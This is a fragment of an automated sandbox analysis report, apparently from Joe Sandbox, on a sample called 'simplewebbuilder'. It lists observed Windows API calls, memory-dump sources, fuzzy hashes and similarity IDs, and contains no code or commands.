• Opcode Fuzzy Hash: 25b401ee7726a50f965d33433f6a6ab639d25e1a3ef0d64bf08ad7217f893408
• Instruction Fuzzy Hash: B5318C71108701AFC310DF29C985AABB7F9EFD8760F140A1EF49683651DB30E94ACB92
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 009BE6F3
  • Part of subcall function 009B1A01: TlsGetValue.KERNEL32 ref: 009B1A0A
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BE772
• RtlEnterCriticalSection.NTDLL(?), ref: 009BE78E
• InterlockedIncrement.KERNEL32(009E61A0), ref: 009BE7B3
• RtlLeaveCriticalSection.NTDLL(?), ref: 009BE7C8
  • Part of subcall function 009B27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 009B284E
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
• String ID:
• API String ID: 1578506061-0
• Opcode ID: b94eedbf1866e221b7654ed9c9083a937722ebbd71d4104b0eb47e4a8a0fa2e1
• Instruction ID: a249d1f7262bf0a08e2f03a19fb12920646f76e5b1f426f4eb4b91a3b0dffcea
• Opcode Fuzzy Hash: b94eedbf1866e221b7654ed9c9083a937722ebbd71d4104b0eb47e4a8a0fa2e1
• Instruction Fuzzy Hash: C43117719056489FCB10DFA8C944BEEBBF8FF48320F14855EE449E7641EB74AA04DBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 009B2A3B
• closesocket.WS2_32 ref: 009B2A42
• ioctlsocket.WS2_32(?,8004667E,00000000), ref: 009B2A89
• WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 009B2A97
• closesocket.WS2_32 ref: 009B2A9E
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: ErrorLastclosesocket$ioctlsocket
• String ID:
• API String ID: 1561005644-0
• Opcode ID: cdf74e53c67696927aa941276046df5b73f8c9030a06d7c058727f3c33bad341
                                                                                                                            • Instruction ID: 4530e2a7c5f490e7c5ab4398499e4711dcd7d262462f4ddedf6e7b818e208adb
                                                                                                                            • Opcode Fuzzy Hash: cdf74e53c67696927aa941276046df5b73f8c9030a06d7c058727f3c33bad341
                                                                                                                            • Instruction Fuzzy Hash: 4F212B71D04205AFCB24ABB88E45BAEB7EDDF84321F14456EE555C3192EA70CD40C761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 009D09B0
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • _free.LIBCMT ref: 009D09C3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: b415c0b15f413b93f4f9bf8ed72b89e8c191bbdac3c8aa699be194eb27d6ab92
                                                                                                                            • Instruction ID: 402f147cbf0385716931a0ad6dba1e909b12f2b8c1441c43dd8f689ad76b3728
                                                                                                                            • Opcode Fuzzy Hash: b415c0b15f413b93f4f9bf8ed72b89e8c191bbdac3c8aa699be194eb27d6ab92
                                                                                                                            • Instruction Fuzzy Hash: E311E731C997159ADB243FB0AC49F5A37989B94360F10C42BF9199B261DF348940D692
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B21DA
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B21ED
                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 009B2224
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 009B2237
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009B2261
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
                                                                                                                              • Part of subcall function 009B2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
                                                                                                                              • Part of subcall function 009B2341: GetLastError.KERNEL32 ref: 009B237A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856819132-0
                                                                                                                            • Opcode ID: 44e1303c698ff9981d1e0366ebf7ae462292f7ccfd01b86e9421278c3695820f
                                                                                                                            • Instruction ID: 055ac52fca2cdcb1fb99086a367515cf365ffde466eba6edadaaeb8ad1c743fc
                                                                                                                            • Opcode Fuzzy Hash: 44e1303c698ff9981d1e0366ebf7ae462292f7ccfd01b86e9421278c3695820f
                                                                                                                            • Instruction Fuzzy Hash: CA11DF71D04118EBCB049FA4DD04AFEBBB9FF44320F00852AE825E2271DB304A41EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B229D
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009B22B0
                                                                                                                            • TlsGetValue.KERNEL32 ref: 009B22E7
                                                                                                                            • TlsSetValue.KERNEL32(?), ref: 009B2300
                                                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 009B231C
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2350
                                                                                                                              • Part of subcall function 009B2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2360
                                                                                                                              • Part of subcall function 009B2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B2370
                                                                                                                              • Part of subcall function 009B2341: GetLastError.KERNEL32 ref: 009B237A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856819132-0
                                                                                                                            • Opcode ID: 1c109ff340c90fcebf98cdd7b6312d8c8e6939bc9a7ed8825e5f11e50efcecd4
                                                                                                                            • Instruction ID: 9446252d87c11d6c91105dee5cb1ecf588c60c8863793592d706c54c21471e3d
                                                                                                                            • Opcode Fuzzy Hash: 1c109ff340c90fcebf98cdd7b6312d8c8e6939bc9a7ed8825e5f11e50efcecd4
                                                                                                                            • Instruction Fuzzy Hash: F9119071D14218EBCB019FA5DC44AFEBFB9EF84360F00812AE814A3221CB754A55EB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009BB75B: __EH_prolog.LIBCMT ref: 009BB760
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009BC325
                                                                                                                              • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,009E2DB4,?,00000001), ref: 009BC33B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009BC34E
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,009E2DB4,?,00000001), ref: 009BC35E
                                                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BC36C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2725315915-0
                                                                                                                            • Opcode ID: d5ecb5f77ccf48272d03af38c9073f8c12dae3090190dc2d5dd467d72d883bac
                                                                                                                            • Instruction ID: 8c7d07c8208b876d1e38c9b632dbcd4441104b7dddb6a5c6e98977093aa6f316
                                                                                                                            • Opcode Fuzzy Hash: d5ecb5f77ccf48272d03af38c9073f8c12dae3090190dc2d5dd467d72d883bac
                                                                                                                            • Instruction Fuzzy Hash: 1E0181B6A54304AFDB10EFA4DC89FCB77ECEB04725F008525F625D7191DB60E8489710
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B2432
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B2445
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B2454
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B2469
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B2470
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 747265849-0
                                                                                                                            • Opcode ID: 89daf5614ac5141f8ef1ad9cff69343690c94f42d9886e459b62c548714a0314
                                                                                                                            • Instruction ID: 483d158884395c21bb4a9c78745a2a506d915cd304ea87e800e606c17d1ac194
                                                                                                                            • Opcode Fuzzy Hash: 89daf5614ac5141f8ef1ad9cff69343690c94f42d9886e459b62c548714a0314
                                                                                                                            • Instruction Fuzzy Hash: F9F09072281600BBD700ABA0ED89FD7772DFB44711F804012F701D64A1DF64B954DBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 009B1ED2
                                                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 009B1EEA
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B1EF9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 009B1F0E
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B1F15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 830998967-0
                                                                                                                            • Opcode ID: 8742a14a8d2bd8536bbc090ba189b5305af3b8de1adb6168a3a62c5f017ff009
                                                                                                                            • Instruction ID: 6336244fc2bb6a5646c9bd7e3b72ad697636e797f235e67bc2f104ff9c48ee18
                                                                                                                            • Opcode Fuzzy Hash: 8742a14a8d2bd8536bbc090ba189b5305af3b8de1adb6168a3a62c5f017ff009
                                                                                                                            • Instruction Fuzzy Hash: 29F09A32256604BBD700AFA1ED88FD7BB2CFF08351F004016F20192462CB70A9A9DBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 58bc104d2e083ae9af0b242bf44697baf19feb154ac27c99577fde8e1ceb6b1d
                                                                                                                            • Instruction ID: d9386c6cb78afadedd3152567388f27f6b11ed70d5720799f08d6199a7965070
                                                                                                                            • Opcode Fuzzy Hash: 58bc104d2e083ae9af0b242bf44697baf19feb154ac27c99577fde8e1ceb6b1d
                                                                                                                            • Instruction Fuzzy Hash: 16419331700200ABDB24AE69D985AA7B7ADEB99764B140D2EF9558B3C1CF70E804CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B30C3
                                                                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 009B3102
                                                                                                                            • _memcmp.LIBCMT ref: 009B3141
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                                                            • String ID: 255.255.255.255
                                                                                                                            • API String ID: 1618111833-2422070025
                                                                                                                            • Opcode ID: a7aec726208b94422643305edaa6af73bbe7510d06e14ad226917b14d08eb683
                                                                                                                            • Instruction ID: 2b8d5f6399519300d98f591c72a407c6a44aec633366f3727dafffcf2ea12071
                                                                                                                            • Opcode Fuzzy Hash: a7aec726208b94422643305edaa6af73bbe7510d06e14ad226917b14d08eb683
                                                                                                                            • Instruction Fuzzy Hash: B431F371D043089FDB20EF68C981BAEB7A9AF41320F24892DE96597281DB719A418B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B1F5B
                                                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 009B1FC5
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 009B1FD2
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                                            • String ID: iocp
                                                                                                                            • API String ID: 998023749-976528080
                                                                                                                            • Opcode ID: efcdfe157258a9666c4001ad2b1def7b79fe8949f4cd5e155ede7d53fed8179e
                                                                                                                            • Instruction ID: c1e7919856470fa58e28e0d46289e89dbf04bbfa5a96171206ef58ac82a8d0a6
                                                                                                                            • Opcode Fuzzy Hash: efcdfe157258a9666c4001ad2b1def7b79fe8949f4cd5e155ede7d53fed8179e
                                                                                                                            • Instruction Fuzzy Hash: 1121E5B1801B44DFC720DF6AC54059AFBF8FFA4720B108A1FE4A683A60D7B0A604CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction ID: 3fc6234a2594f0c7c4f8fd7f4d61d5b765ea0d6a512059466152f22e4b19d7c1
                                                                                                                            • Opcode Fuzzy Hash: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction Fuzzy Hash: 2A112832900209ABDF228F94CE44ADEBBB6FF48350F154166FA61722A0D736CD71DB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • std::exception::exception.LIBCMT ref: 009C4182
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 009C4197
                                                                                                                              • Part of subcall function 009C4B5A: RaiseException.KERNEL32(?,?,009C0155,?,?,?,?,?,?,?,009C0155,?,009E1F98,?), ref: 009C4BAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID: bad allocation
                                                                                                                            • API String ID: 3074076210-2104205924
                                                                                                                            • Opcode ID: ea690ddaa51a6e5259644e4563c8db4b617190bef7097bdf74ecdf5e373af953
                                                                                                                            • Instruction ID: 30b3ce4d0cc05f8187eb0ddf7debb3ccc2584aa1a48d20526a9974e5ba21cf88
                                                                                                                            • Opcode Fuzzy Hash: ea690ddaa51a6e5259644e4563c8db4b617190bef7097bdf74ecdf5e373af953
                                                                                                                            • Instruction Fuzzy Hash: 94E03034E4420AAACF10FFA4DC51FEF77A8AB60310F504459A824A6591DF70DA54D792
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B37B6
                                                                                                                            • __localtime64.LIBCMT ref: 009B37C1
                                                                                                                              • Part of subcall function 009C2C00: __gmtime64_s.LIBCMT ref: 009C2C13
                                                                                                                            • std::exception::exception.LIBCMT ref: 009B37D9
                                                                                                                              • Part of subcall function 009C2AD3: std::exception::_Copy_str.LIBCMT ref: 009C2AEC
                                                                                                                              • Part of subcall function 009BAB1E: __EH_prolog.LIBCMT ref: 009BAB23
                                                                                                                              • Part of subcall function 009BAB1E: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009BAB32
                                                                                                                              • Part of subcall function 009BAB1E: __CxxThrowException@8.LIBCMT ref: 009BAB51
                                                                                                                            Strings
                                                                                                                            • could not convert calendar time to UTC time, xrefs: 009B37CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                                                            • API String ID: 1963798777-2088861013
                                                                                                                            • Opcode ID: 2c35f15be135b857bc7622f8afdfbaa9d9f184dd3cae383c92c90710c1fcb6d7
                                                                                                                            • Instruction ID: 035487aea9edd2f2322ffbd1a6347671bbbd070fb9e0352cee5253afe9d52eb8
                                                                                                                            • Opcode Fuzzy Hash: 2c35f15be135b857bc7622f8afdfbaa9d9f184dd3cae383c92c90710c1fcb6d7
                                                                                                                            • Instruction Fuzzy Hash: 50E06DB1C4420A9ACB20FF90C905BFEB7B8EB44314F40855AE815A2241DB749609CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction ID: ae1f0f37a1caea7582e622d33e18e97b99b5337afe9bfc2040585345cf76d9d0
                                                                                                                            • Opcode Fuzzy Hash: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction Fuzzy Hash: A4C012B0780701A2EA201BB02F0AB1622280B80F02F16243EAB8DF08C2CE7CD805A42D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 714016831-0
                                                                                                                            • Opcode ID: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction ID: 82e4f5ca211df2534f48b16e1633463362d6e61a1909367565888a0a16669b2c
                                                                                                                            • Opcode Fuzzy Hash: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction Fuzzy Hash: 2331E370601706ABE3308F24DD49B22BBA8EB48756F14463BE555BB7E1E778AD40CB4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustPointer_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1721217611-0
                                                                                                                            • Opcode ID: e89ea2f4857698563857d07c02b95d6029b4d133af8a11b520ce45c9acb3c249
                                                                                                                            • Instruction ID: d641029581df085fab47ccb3d6f60437fc65a0b4a644f85f7806055617352aaf
                                                                                                                            • Opcode Fuzzy Hash: e89ea2f4857698563857d07c02b95d6029b4d133af8a11b520ce45c9acb3c249
                                                                                                                            • Instruction Fuzzy Hash: A54189B6A483066BEB249FA4D842F767BA89F41324F24441EF849A61D1EB75EC80D612
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C19BF
                                                                                                                              • Part of subcall function 009B3FDC: __EH_prolog.LIBCMT ref: 009B3FE1
                                                                                                                              • Part of subcall function 009B3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 009B3FF3
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009C19B4
                                                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C1A00
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009B4149), ref: 009C1AD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Event$CreateH_prolog
• String ID:
• API String ID: 2825413587-0
• Opcode ID: 41cd3489cf7b6ea063a6b07b1a04744b934a0027fd72335d505e255fa08fc773
• Instruction ID: 5487857e4df98b4ebe1fb1b97a09d932d2a1ced61371ded81c8c9e9a5d6f176f
• Opcode Fuzzy Hash: 41cd3489cf7b6ea063a6b07b1a04744b934a0027fd72335d505e255fa08fc773
• Instruction Fuzzy Hash: 9C51E471A003058BDB11DF28C884B9A77E8FF89328F15461CF86997392D735DD45CB96
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
Yara matches
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
